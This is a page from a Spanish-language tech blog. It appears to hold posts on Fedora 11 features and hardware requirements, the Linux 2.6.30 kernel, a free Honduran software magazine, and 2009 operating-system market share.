  • Sistema de archivo Ext4 - El sistema de archivo ext3 se mantuvo como un estándar maduro en Linux por un largo tiempo. El sistema de archivo ext4 es una actualización principal que tiene un diseño mejorado, una mejor performance y confiabilidad, soporte para un almacenamiento más grande y chequeos de sistema de archivo y borrado de archivos mucho más rápido. Ahora es el sistema de archivo predeterminado para instalaciones nuevas.
  • Consola Virt Mejorada - En Fedora 10 y anteriores, la consola de invitado virtual se limitaba a una resolución de 800x600. En Fedora 11, el objetivo es tener una pantalla predeterminada de 1024x768 mínima. Las instalaciones nuevas de F11 proveerán la habilidad de usar otros dispositivos en el invitado virtual, tales como las tabletas USB, que los invitados automáticamente detectarán y configurarán. Junto con los resultados están un puntero del ratón que sigue al puntero del cliente local uno a uno, y prove capacidades extendidas.
  • MinGW (compilador cruzado de Windows) - Fedora 11 provee MinGW, un entorno de desarrollo para usuarios de Fedora que quieran compilar en forma cruzada sus programas para que se ejecuten en Windows sin tener que usar Windows. En el pasado, los desarrolladores tenían que portar y compilar todas las bibliotecas y herramientas que necesitaban, y este enorme esfuerzo ocurría muchas veces de manera independiente. MinGW elimina este trabajo duplicado a los desarrolladores de aplicaciones proveyéndoles de un rango de bibliotecas y de herramientas de desarrollo que ya fueron portados al entorno del compilador cruzado. Los desarrolladores no tendrán que recompilar toda la pila de aplicaciones por si mismos, sino que solamente tendrán que concentrarse en los cambios necesarios por su aplicación.

Requerimientos de Hardware

Requerimientos de procesador y memoria para Arquitecturas PPC

  • CPU mínimo; PowerPC G3 / POWER3
  • Fedora 11 soporta sólo la generación "Mundo Nuevo" de la Apple Power Macintosh, que viene desde circa 1999 en adelante. A pesar que debería funcionar en las máquinas del "Viejo Mundo", se requiere un cargador de arranque especial que no se incluye en la distribución de Fedora. Fedora también fue probado en máquinas POWER5 y POWER6.
  • Fedora 11 soporta las máquinas pSeries y Cell Broadband Engine.
  • Fedora 11 también soporta la Sony PlayStation 3 y Genesi Pegasos II y Efika.
  • Fedora 11 incluye un nuevo soporte de hardware para máquinas P.A. Semiconductor 'Electra'.
  • Fedora 11 también incluye soporte para las estaciones de trabajo Terrasoft Solutions powerstation.
  • Para modo texto se recomienda: 233 MHz G3 o mejor, 128MB RAM.
  • Para gráficos: 400 MHz G3 o mejor, 256 MB RAM.

Requerimientos de Memoria y procesador en arquitecturas x86

Las siguientes especificaciones de CPU se pusieron en términos de procesadores Intel. Los demás procesadores, tales como los de AMD, Cyrix y VIA, que son compatibles y equivalentes a los procesadores de Intel, también se pueden usar con Fedora. Fedora 11 requiere un Intel Pentium o mejor, y está optimizado para procesadores Pentium 4 y posteriores.
  • Para modo texto se recomienda: Pentium 200 MHz o mejor
  • Para gráficos: 400 MHz Pentium II o mejor
  • RAM mínimo para modo texto: 128 MB
  • Mínimo de RAM para gráficos: 192 MB
  • RAM recomendado para gráficos: 256 MB

Requerimientos de Memoria y Procesador en arquitecturas x86_64

  • RAM mínimo para modo texto: 256 MB
  • Mínimo de RAM para gráficos: 384 MB
  • RAM recomendado para gráficos: 512 MB

Requerimientos de Espacio en Disco Rígido para todas las arquitecturas

Todos los paquetes pueden ocupar hasta 9 GB de espacio en disco. El tamaño final está determinado por el medio de instalación y los paquetes que se hayan seleccionado. Se requerirá espacio de disco adicional para dar soporte al entorno de instalación. Este espacio adicional corresponde al tamaño de /Fedora/base/stage2.img (en el Disco 1 de Instalación) más el tamaño de los archivos en /var/lib/rpm en el sistema instalado.
En términos prácticos, los requerimientos de espacio adicional puede ir desde 90MB para una instalación mínima hasta 175MB para una instalación más grande.
También se necesita espacio adicional para los datos del usuario, y se debe reservar al menos un 5% de espacio libre para el funcionamiento adecuado del sistema.

Saber mas de fedora 11

nuevo núcleo de Linux acaba de salir

Un nuevo núcleo de Linux acaba de salir a la luz, con varias mejoras que incluyen desde sistemas de archivos más eficientes a un nuevo protocolo para redes inalámbricas, pasando por nuevos sistemas para redes, compresión del kernel y correcciones de bugs que fueron detectados en la versión anterior.

Se trata de la versión 2.6.30, en la que se destaca el sistema de archivos NILFS2, creado por la Nippon Telegraph and Telephone Corporation, que trabaja con una estructura llamada “de bloques” o “log-structured”.

Bajo este sistema de archivo, un disco se convierte en algo lineal y opera de forma más rápida y eficiente, además de que todas las operaciones son secuenciales, evitando sobreescrituras innecesarias.

Otro sistema de archivos incorporado al kernel 2.6.30 es el POHMELFS, que se ve como un posible reemplazo del sistema de archivos para redes NFS, y otra de las incorporaciones de la mano de Atheros es el protocolo IEEE 802.11w: una extensión del actual estándar 802.11 para mejorar la seguridad de los marcos de administración, impidiendo las interrupciones de la red por parte de agentes maliciosos.

También hay mejoras en cuanto a la compresión del kernel. Usualmente el kernel utiliza GZIP para las tareas de compresión, pero ahora se agregaron los algoritmos BZIP2 y LZMA, reduciendo su tamaño en un 10% adicional con BZIP2, y más del 30% con LZMA.

En otros aspectos, la gente de Intel contribuyó para optimizar los tiempos de inicio, ya que el proceso de inicio de un kernel puede verse demorado en reiteradas ocasiones porque trabaja de manera sincrónica, o sea, no puede empezar una nueva tarea sin haber terminado la anterior.

Además, uno de los puntos más lentos durante el inicio es la detección de medios de almacenamiento y sus particiones. El kernel debe esperar a que se reporten, lo cual prolonga más la demora.

En cambio, con la versión 2.6.30, las funciones de llamado son asincrónicas, por lo que el kernel puede seguir cargándose mientras los dispositivos se inician a su propio tiempo, traduciéndose en distribuciones de Linux más elaboradas y con mayor compatibilidad.

http://www.kernel.org/

domingo, 8 de marzo de 2009

Número 1 de Informática Libre

Acaba de publicarse el primer número de una nueva revista gratuita dedicada a Linux y el software libre.

"Informática Libre", es una revista elaborada en Honduras y que está disponible para su libre descarga en formato PDF.

Algunos de los temas que trata este número son:
- Richard M. Stallman: Científico de la informática al servicio de la humanidad.
- Usa tu computadora sin disco duro.
- Los cibercafés pueden decir adiós a las Licencias.
- Razones para el uso del Software Libre en la educación.
- Herramientas libres en educación.
- Lo que se te ocurra… diseñalo con libertad.
- De todo para la oficina.
- Variedad para escuchar y ver sin restricciones.
- Juegos: Diversión para cipotes y adultos.
- Navega con seguridad.
- Y mucho más...

Descargar

viernes, 2 de enero de 2009

Muchos usuarios prefieren MAC y Linux en vez de Windows Vista




En el terreno de los sistemas operativos Windows ha sufrido el mayor descenso mensual de su historia, perdiendo casi un punto con respecto a los datos de noviembre.

Windows Vista está ocasionando una auténtica sangría de usuarios que migran a Mac y Linux.

Según los datos publicados por Marketshare, durante el pasado mes de diciembre Windows redujo su cuota de penetración hasta el 88,68%, casi un punto menos que la alcanzada en noviembre (89,62%).

Mac fue el principal beneficiado, absorviendo casi la totalidad de los usuarios perdidos de Microsoft desde el 8,87% de noviembre hasta el 9,63% de diciembre.

Finalmente Linux creció también desde el 0,83% al 0,85%.

Ya veremos que cambios nos deparan el lanzamiento de Windows 7.

Via Hispamp3

Etiquetas

INTERNET (459) newsweek (305) SEGURIDAD (224) software (136) HACK (86) GOOGLE (47) Hacker (46) Geek (41) hardware (36) WINDOWS (34) Hackers (31) CRACK (29) facebook (29) video (28) DESCARGA (27) videos (26) Celulares (25) MICROSOFT (22) Informatica (21) apple (19) GRATIS (18) technology (18) virus (18) exploit (17) computación (16) informatico (16) web (15) cracker (14) INALAMBRICO (13) WINDOWS 7 (13) noticias (11) MSN (10) termino (10) ACTUALIZACION (9) Gamer (9) LapTops (9) Mac (9) PASSWORD (9) WINDOWS XP (9) dns (9) firefox (9) juegos (9) FOTOS (8) cientifico (8) iphone (8) WEP (7) antivirus (7) bibliografia (7) Desencriptar (6) INFINITUM (6) wifi (6) youtube (6) Craker (5) Culiacan (5) DESMOSTRACION (5) TELEFONIA (5) gmail (5) messenger (5) DIRECTA (4) DOWNLOAD (4) ESPAÑOL (4) XBOX (4) xss (4) Glosario (3) HTML (3) WPA (3) anuncios (3) ataques (3) hosting (3) hotmail (3) Guru (2) ajax (2) wpa2 (2)